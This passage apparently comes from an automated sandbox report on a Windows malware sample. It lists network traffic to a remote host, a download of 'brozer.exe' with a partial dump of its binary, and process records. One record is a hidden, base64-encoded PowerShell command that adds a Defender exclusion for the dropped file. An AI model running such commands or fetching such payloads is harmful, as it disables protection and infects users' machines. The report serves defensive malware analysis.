                                                                                                                                                                Nov 15, 2024 10:28:52.003469944 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.003510952 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.003554106 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.003583908 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.052194118 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.052414894 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.052506924 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.052557945 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.052619934 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.052647114 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.057429075 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.057574034 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.057646036 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.057698011 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.067373037 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.067580938 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.067671061 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.067739964 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.067825079 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.067888021 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.067955017 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.067992926 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.068046093 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.068089008 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.068140030 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.068188906 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.068240881 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.068278074 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.072803020 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.072870016 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.118725061 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.118906021 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.119051933 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.119112015 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.119160891 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.119216919 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.119242907 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.166933060 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.167021036 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.208786011 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.208928108 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.209027052 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.209069014 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.213988066 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.214138985 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.254762888 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.255152941 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.302783966 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.302895069 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.305365086 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.305548906 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.305618048 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.305659056 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.310647964 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.310739040 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.310837984 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.310904980 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.310961008 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.354659081 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.354846001 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.394113064 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.394316912 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.394409895 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.394449949 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.395231962 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.395389080 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.395474911 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.395519018 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.395566940 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.395596027 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.399799109 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.399972916 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.400034904 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.400072098 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.442635059 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.442783117 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.475765944 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.476073027 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476186991 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476249933 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476320982 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476383924 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476473093 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476526022 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476574898 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476624012 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476679087 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476732016 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476794958 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476843119 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476893902 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.476919889 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.481190920 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481215000 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481230974 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481240034 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481276989 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481286049 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481329918 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.481348038 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481358051 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481364965 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.481386900 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481395960 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481430054 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.481530905 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.481616020 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481631994 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481684923 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.481784105 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481795073 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481803894 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481812954 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481827021 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481843948 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481853008 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481862068 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481863022 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.481872082 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481889009 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481899023 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481908083 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.481924057 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.481950045 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.482062101 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532095909 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.532341003 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532439947 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532500029 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532577991 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532635927 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532702923 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532749891 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532814026 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532866001 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532913923 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.532968998 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.533016920 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.533057928 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.556099892 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.556113958 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.556123972 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.556288958 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.556288958 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.556382895 CET156665397645.130.145.152192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:52.556418896 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.556484938 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.556544065 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                Nov 15, 2024 10:28:52.556618929 CET5397615666192.168.2.445.130.145.152
                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Nov 15, 2024 10:28:45.278686047 CET192.168.2.41.1.1.10x67d9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Nov 15, 2024 10:28:45.285418034 CET1.1.1.1192.168.2.40x67d9No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 15, 2024 10:28:45.285418034 CET1.1.1.1192.168.2.40x67d9No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 15, 2024 10:28:45.285418034 CET1.1.1.1192.168.2.40x67d9No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.449736150.241.95.163807148C:\Users\user\Desktop\9RM52QaURq.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 15, 2024 10:28:13.232213974 CET74OUTGET /brozer.exe HTTP/1.1
                                                                                                                                                                Host: 150.241.95.163
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Nov 15, 2024 10:28:15.136056900 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.22.1
                                                                                                                                                                Date: Fri, 15 Nov 2024 09:28:15 GMT
                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                Content-Length: 2632704
                                                                                                                                                                Last-Modified: Thu, 14 Nov 2024 19:32:03 GMT
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                ETag: "67365033-282c00"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 54 97 d1 e9 35 f9 82 e9 35 f9 82 e9 35 f9 82 f9 b1 fa 83 e1 35 f9 82 f9 b1 fd 83 e6 35 f9 82 f9 b1 fc 83 ba 35 f9 82 a2 4d fc 83 48 35 f9 82 a2 4d fa 83 ee 35 f9 82 a2 4d fd 83 fa 35 f9 82 d1 b5 fc 83 eb 35 f9 82 a1 b0 fd 83 cd 35 f9 82 a2 4d f8 83 e2 35 f9 82 e9 35 f8 82 68 35 f9 82 a2 b0 f0 83 fa 35 f9 82 a2 b0 06 82 e8 35 f9 82 a2 b0 fb 83 e8 35 f9 82 52 69 63 68 e9 35 f9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e8 4f 34 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 6a 03 00 00 d6 24 00 00 00 00 00 f0 d0 02 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T555555MH5M5M555M55h5555Rich5PEdO4g")j$@(`T'd`(0(p,p(P'8'@.texthj `.rdatap$r$n@@.data(('@.pdatap,0(.'@@.rsrc`( (@@.relocPp("(@B
                                                                                                                                                                Nov 15, 2024 10:28:15.136115074 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 48 8d 0d 55 12 28 00 e8 a0 17 03 00 48 8d 0d d9 67 03 00 48 83 c4 28 e9 e8 bd 02 00 48 8d
                                                                                                                                                                Data Ascii: H(HU(HgH(H1hHgH(H(hHhH(H9h@WAVHhH'H3HD$HLH+HuH$Hl$`H@H:
                                                                                                                                                                Nov 15, 2024 10:28:15.136152029 CET1236INData Raw: 40 08 4d 85 c0 0f 84 05 01 00 00 48 8b 4b 10 48 85 c9 74 14 48 ff c1 48 89 4b 10 48 8b 43 18 48 ff c8 48 89 43 18 eb 7c 49 8b cc ff 15 13 6e 03 00 4c 8b f8 48 89 7c 24 28 48 85 c0 0f 84 c7 00 00 00 0f b7 70 14 48 83 c6 18 48 03 f0 48 89 74 24 28
                                                                                                                                                                Data Ascii: @MHKHtHHKHCHHC|InLH|$(HpHHHt$(Df|$ fE;ws&AHIpujFIHCFHCHKHthHCHt_LCI;rVLM+LI;wHHsHHrmH;tZHKHHKHCHHCLH(Ht$(fAfDt
                                                                                                                                                                Nov 15, 2024 10:28:15.136184931 CET1236INData Raw: 8b 5b 30 49 8b 73 38 49 8b 7b 40 49 8b e3 41 5f 41 5e 41 5d 41 5c 5d c3 48 8d 43 f0 eb cd cc cc cc cc cc cc cc cc cc cc 40 55 53 41 54 41 55 48 8b ec 48 83 ec 48 48 8b 05 cb f0 27 00 48 33 c4 48 89 45 f0 44 8b ea 4c 8b e1 e8 f9 fc ff ff 48 8b d8
                                                                                                                                                                Data Ascii: [0Is8I{@IA_A^A]A\]HC@USATAUHHHH'H3HEDLHHu3Ht$xH$LEHEH}EHUL|$@HMh3}u}uAAEtH\3L$D3H}HELEEHU
                                                                                                                                                                Nov 15, 2024 10:28:15.136220932 CET1236INData Raw: d5 04 00 48 89 03 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc 48 89 4c 24 08 53 48 83 ec 20 48 8b c2 48 8b d9 48 8d 0d 91 d5 04 00 48 89 0b 48 8d 53 08 0f 57 c0 0f 11 02 48 8d 48 08 e8 ef cc 02 00 90 48 8d 05 8b d5 04 00 48 89 03 48 8b c3 48 83 c4
                                                                                                                                                                Data Ascii: HHH [HL$SH HHHHHSWHHHHHH [H(HB$@SH@H'H3HD$8LHHL$ HzvLHHHQWLD$(D$0HL$(ZH&HHHL$8H3H
                                                                                                                                                                Nov 15, 2024 10:28:15.136254072 CET1236INData Raw: f9 00 10 00 00 72 0b 48 8d 41 27 48 3b c1 76 38 eb b6 e8 1d ab 02 00 4c 8d 46 01 48 89 03 49 8b d6 48 89 73 10 48 8b c8 48 89 7b 18 e8 df 3a 03 00 48 8b c3 48 8b 5c 24 50 48 83 c4 20 41 5e 5f 5e c3 e8 35 e0 01 00 cc e8 83 fa ff ff cc e8 3d fb ff
                                                                                                                                                                Data Ascii: rHA'H;v8LFHIHsHH{:HH\$PH A^_^5=@SUVWAWH HiILHL;w*HHvH9HqH{:H>H A__^][HH;HLt$hHH;wEHHHH+H;w4H*HH;HBHOHu
                                                                                                                                                                Nov 15, 2024 10:28:15.136288881 CET1236INData Raw: 5e 5e 5d 5b c3 e8 b2 f6 ff ff cc e8 ec f5 ff ff cc e8 92 db 01 00 cc cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 56 48 83 ec 40 48 8b 05 57 e2 27 00 48 33 c4 48 89 44 24 38 48 8b e9 33 d2 48 8d 4c 24 30 e8 b4 ff 02 00 90 48 8b 35 58 00
                                                                                                                                                                Data Ascii: ^^][H\$Hl$VWAVH@HW'H3HD$8H3HL$0H5X(Ht$ H=\(Hu>3HL$(H9=C(u;'3'HH*(HL$(H=(HML4H;ysHAIHus3y$tH;xsH@IHuQHtHGHH
                                                                                                                                                                Nov 15, 2024 10:28:15.136322975 CET1236INData Raw: e8 bf c7 01 00 4c 89 75 07 48 8b 4d f7 48 85 c9 74 05 e8 ad c7 01 00 4c 89 75 f7 48 8b 4d e7 48 85 c9 74 05 e8 9b c7 01 00 4c 89 75 e7 48 8b 4d d7 48 85 c9 74 05 e8 89 c7 01 00 4c 89 75 d7 48 8b 4d c7 48 85 c9 74 05 e8 77 c7 01 00 4c 89 75 c7 48
                                                                                                                                                                Data Ascii: LuHMHtLuHMHtLuHMHtLuHMHtwLuHMHteLuHM8L$I[(Is8IA^_]HB4wq@SH HHtHKHK HK(H [H(H=44
                                                                                                                                                                Nov 15, 2024 10:28:15.136357069 CET1236INData Raw: cc cc cc cc 40 53 48 83 ec 20 80 79 18 00 49 8b d9 4c 8b ca 48 8b c1 74 3a 48 8b 49 20 48 85 c9 74 31 49 8b 10 48 85 d2 79 06 44 0f b7 c2 eb 0b 4c 8b 40 08 48 83 c2 02 4c 03 c2 48 8b 01 49 8b d1 ff 10 48 85 c0 74 0b 48 89 03 b0 01 48 83 c4 20 5b
                                                                                                                                                                Data Ascii: @SH yILHt:HI Ht1IHyDL@HLHIHtHH [2H [LD$SUVWAUAVH83MMHHHtm@u_MZf9uUHcG<=JHHu5;PEu-Ht(HtDDT$ DSDT$
                                                                                                                                                                Nov 15, 2024 10:28:15.136395931 CET1236INData Raw: f8 00 00 00 48 8b cf e8 84 18 00 00 84 c0 0f 85 12 01 00 00 41 bc 0b 02 00 00 66 44 39 67 18 0f 85 01 01 00 00 4c 89 b4 24 98 00 00 00 48 8d 05 7c 2a 07 00 48 85 f6 48 89 44 24 20 4c 8d 74 24 20 48 89 5c 24 30 4c 0f 45 f6 48 89 6c 24 38 33 f6 ba
                                                                                                                                                                Data Ascii: HAfD9gL$H|*HHD$ Lt$ H\$0LEHl$83@Ht$Aft$E@t$G$uHfD9;uBHcC<=7H<Hu"?PEuHtHuwH*Lt$HfA;HD$(HD$@L$Hu8L
                                                                                                                                                                Nov 15, 2024 10:28:15.141387939 CET520INData Raw: 00 84 c0 0f 85 b6 00 00 00 bf 4d 5a 00 00 66 39 3b 0f 85 a8 00 00 00 48 63 43 3c 3d 00 04 00 00 0f 8f 99 00 00 00 48 8d 34 03 ba f8 00 00 00 48 8b ce e8 85 13 00 00 84 c0 0f 85 80 00 00 00 81 3e 50 45 00 00 75 78 48 85 f6 74 73 ba 40 00 00 00 48
                                                                                                                                                                Data Ascii: MZf9;HcC<=H4H>PEuxHts@Hcubf9;u]HcC<=RH<H>u=?PEu5Ht0H u3f9OHDH\$0Ht$8H _H\$03Ht$8H _H\$Hl$Ht$WH H


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.453977172.67.74.1524433760C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-15 09:28:45 UTC100OUTGET / HTTP/1.1
                                                                                                                                                                Accept: text/html; text/plain; */*
                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-11-15 09:28:46 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 15 Nov 2024 09:28:46 GMT
                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                Content-Length: 14
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Origin
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8e2e3687d9f36c40-DFW
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1146&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=738&delivery_rate=2437710&cwnd=244&unsent_bytes=0&cid=21cf34fd05db37b1&ts=250&x=0"
                                                                                                                                                                2024-11-15 09:28:46 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 39
                                                                                                                                                                Data Ascii: 173.254.250.89


                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:04:28:04
                                                                                                                                                                Start date:15/11/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\9RM52QaURq.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\9RM52QaURq.exe"
                                                                                                                                                                Imagebase:0x7a0000
                                                                                                                                                                File size:37'376 bytes
                                                                                                                                                                MD5 hash:9913A016528F9D9C4AAC737C6A06C596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:04:28:31
                                                                                                                                                                Start date:15/11/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA
                                                                                                                                                                Imagebase:0x7a0000
                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:04:28:31
                                                                                                                                                                Start date:15/11/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:7
                                                                                                                                                                Start time:04:28:32
                                                                                                                                                                Start date:15/11/2024
                                                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                                                File size:496'640 bytes
